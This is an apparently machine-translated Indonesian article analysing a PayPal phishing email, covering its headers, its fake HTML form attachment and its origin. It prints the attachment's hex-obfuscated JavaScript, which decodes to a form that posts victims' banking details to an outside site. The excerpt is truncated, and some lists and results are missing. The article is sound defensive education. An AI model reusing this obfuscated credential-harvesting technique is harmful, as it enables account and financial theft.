Di dunia saat ini di mana informasi semua orang sedang online, phishing adalah salah satu serangan online yang paling populer dan dahsyat, karena Anda selalu dapat membersihkan virus, tetapi jika rincian perbankan Anda dicuri, Anda berada dalam masalah. Berikut adalah rincian salah satu serangan yang kami terima.
Jangan berpikir bahwa itu hanya rincian perbankan Anda yang penting: setelah semua, jika seseorang mendapatkan kontrol atas login akun Anda, mereka tidak hanya tahu informasi yang terkandung dalam akun itu, tetapi kemungkinannya adalah bahwa informasi login yang sama dapat digunakan pada berbagai akun. Dan jika mereka berkompromi dengan akun email Anda, mereka dapat mengatur ulang semua kata sandi Anda yang lain.
Jadi, selain menyimpan kata sandi yang kuat dan beragam, Anda harus selalu waspada terhadap email palsu yang menyamar sebagai hal yang nyata. Meskipun sebagian besar upaya phishing bersifat amatir, beberapa di antaranya cukup meyakinkan sehingga penting untuk memahami cara mengenali mereka di tingkat permukaan serta cara kerjanya di bawah terpal.
Gambar oleh asirap
Contoh email kami, seperti kebanyakan upaya phishing, "memberi tahu" Anda tentang aktivitas di akun PayPal Anda yang, dalam keadaan normal, akan mengkhawatirkan. Jadi ajakan bertindak adalah memverifikasi / memulihkan akun Anda dengan mengirimkan hampir setiap bagian informasi pribadi yang dapat Anda pikirkan. Sekali lagi, ini cukup diformulasikan.
Meskipun tentu saja ada pengecualian, hampir semua email phishing dan scam dimuat dengan bendera merah langsung di pesan itu sendiri. Bahkan jika teksnya meyakinkan, Anda biasanya dapat menemukan banyak kesalahan berserakan di seluruh isi pesan yang menunjukkan pesan itu tidak sah.
Tubuh Pesan
Pada pandangan pertama, ini adalah salah satu email phishing yang lebih baik yang pernah saya lihat. Tidak ada kesalahan ejaan atau tata bahasa dan kata-kata bertuliskan sesuai dengan apa yang Anda harapkan. Namun, ada beberapa bendera merah yang dapat Anda lihat ketika Anda memeriksa konten sedikit lebih dekat.
Header Pesan
Saat Anda melihat header pesan, beberapa tanda merah lainnya muncul:
Lampiran
Ketika saya membuka lampiran, Anda dapat langsung melihat tata letak tidak benar karena tidak ada informasi gaya. Sekali lagi, mengapa PayPal mengirim email ke formulir HTML padahal mereka hanya bisa memberi Anda tautan di situs mereka?
catatan: kami menggunakan penampil lampiran HTML bawaan Gmail untuk ini, tetapi sebaiknya Anda TIDAK MEMBUKA lampiran dari scammer. Tak pernah. Pernah. Mereka sangat sering mengandung eksploitasi yang akan menginstal trojan pada PC Anda untuk mencuri info akun Anda.
Gulir ke bawah sedikit lagi Anda dapat melihat bahwa formulir ini meminta tidak hanya untuk informasi login PayPal kami, tetapi untuk informasi perbankan dan kartu kredit juga. Beberapa gambar rusak.
Jelaslah bahwa upaya phishing ini terjadi setelah semuanya dengan satu langkah.
Meskipun harus cukup jelas berdasarkan apa yang terlihat jelas bahwa ini adalah upaya phishing, kita sekarang akan mendobrak susunan teknis email dan melihat apa yang dapat kita temukan.
Informasi dari Lampiran
Hal pertama yang harus dilihat adalah sumber HTML dari formulir lampiran yang mengirimkan data ke situs palsu.
Saat melihat sumber dengan cepat, semua tautan tampak valid karena mengarah ke “paypal.com” atau “paypalobjects.com” yang sah.
Sekarang kita akan melihat beberapa informasi dasar halaman yang dikumpulkan Firefox di halaman.
Seperti yang Anda lihat, beberapa grafik ditarik dari domain "blessedtobe.com", "goodhealthpharmacy.com" dan "pic-upload.de" bukan domain PayPal yang sah.
Informasi dari Header Email
Selanjutnya kita akan melihat header pesan email mentah. Gmail membuat ini tersedia melalui opsi menu Tampilkan Asli pada pesan.
Melihat informasi header untuk pesan asli, Anda dapat melihat pesan ini disusun menggunakan Outlook Express 6. Saya ragu PayPal memiliki seseorang di staf yang mengirim setiap pesan ini secara manual melalui klien email yang kedaluwarsa.
Sekarang melihat informasi routing, kita dapat melihat alamat IP dari pengirim dan server surat relay.
Alamat IP “Pengguna” adalah pengirim asli. Melakukan pencarian cepat pada informasi IP, kita dapat melihat IP pengiriman di Jerman.
Dan ketika kita melihat email server relay (mail.itak.at), alamat IP kita dapat melihat ini adalah ISP yang berbasis di Austria. Saya ragu PayPal mengarahkan email mereka secara langsung melalui ISP berbasis Austria ketika mereka memiliki sebuah peternakan server besar yang dengan mudah dapat menangani tugas ini.
Ke mana Data Pergi?
Jadi kami telah menentukan dengan jelas bahwa ini adalah email phishing dan mengumpulkan beberapa informasi tentang dari mana asal pesan itu, tetapi bagaimana dengan di mana data Anda dikirim?
Untuk melihat ini, kita harus terlebih dahulu menyimpan lampiran HTM lakukan desktop kita dan buka di editor teks. Menggulirkannya, semuanya tampak berurutan kecuali ketika kita melihat blok Javascript yang mencurigakan.
Memecahkan sumber lengkap dari blok terakhir Javascript, kita melihat:
// Hak cipta © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for (i = 0; i<>
Setiap kali Anda melihat string besar campur aduk huruf dan angka acak yang tertanam dalam blok Javascript, biasanya itu sesuatu yang mencurigakan. Melihat kode, variabel "x" diatur ke string besar ini dan kemudian diterjemahkan ke dalam variabel "y". Hasil akhir dari variabel "y" kemudian ditulis ke dokumen sebagai HTML.
Karena string besar dibuat dari angka 0-9 dan huruf a-f, kemungkinan besar dikodekan melalui ASCII sederhana ke konversi Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Diterjemahkan menjadi:
Bukan suatu kebetulan bahwa ini menerjemahkan ke dalam bentuk tag HTML yang valid yang mengirim hasilnya tidak ke PayPal, tetapi ke situs jahat.
Selain itu, ketika Anda melihat sumber HTML formulir, Anda akan melihat bahwa tag formulir ini tidak terlihat karena dihasilkan secara dinamis melalui Javascript. Ini adalah cara cerdas untuk menyembunyikan apa yang sebenarnya dilakukan HTML jika seseorang hanya melihat sumber yang dihasilkan dari lampiran (seperti yang kita lakukan sebelumnya) sebagai lawan pembukaan lampiran langsung di editor teks.
Menjalankan whois cepat di situs yang menyinggung, kita dapat melihat ini adalah domain yang dihosting di host web populer, 1and1.
Yang menonjol adalah domain menggunakan nama yang dapat dibaca (sebagai lawan dari sesuatu seperti "dfh3sjhskjhw.net") dan domain telah terdaftar selama 4 tahun. Karena itu, saya yakin domain ini dibajak dan digunakan sebagai pion dalam upaya phishing ini.
Ketika datang untuk tetap aman online, tidak ada salahnya untuk memiliki sedikit sinisme yang baik.
Sementara saya yakin ada lebih banyak tanda merah di email contoh, yang kami tunjukkan di atas adalah indikator yang kami lihat setelah hanya beberapa menit ujian. Secara hipotetis, jika tingkat permukaan email menirukan mitra sahnya 100%, analisis teknis akan tetap mengungkapkan sifat sejatinya. Inilah sebabnya mengapa mengimpor untuk dapat memeriksa apa yang Anda bisa dan tidak bisa lihat.